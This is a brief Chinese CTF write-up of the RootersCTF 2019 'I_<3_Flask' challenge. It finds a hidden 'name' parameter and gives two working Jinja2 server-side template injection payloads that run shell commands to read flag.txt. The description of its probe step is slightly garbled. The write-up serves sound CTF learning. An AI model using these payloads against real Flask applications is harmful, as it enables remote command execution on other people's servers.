[RootersCTF2019]I_<3_Flask

题目

打开没什么信息点，得利用工具arjun查找参数。

网上搜索然后下载，kali运行，找到name参数。

查参数

测试?name=49，回显7个7，是flask，没有过滤。

直接payload

/?name={{lipsum.__globals__['os'].popen('cat flag.txt').read()}}

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat flag.txt').read()") }}{% endif %}{% endfor %}

https://blog.csdn.net/qq_44657899/article/details/119726513

https://blog.csdn.net/m0_62905261/article/details/125947743

https://blog.csdn.net/fmyyy1/article/details/115715212

https://blog.csdn.net/Mrs_H/article/details/121411149

https://blog.csdn.net/Zero_Adam/article/details/115081637 这个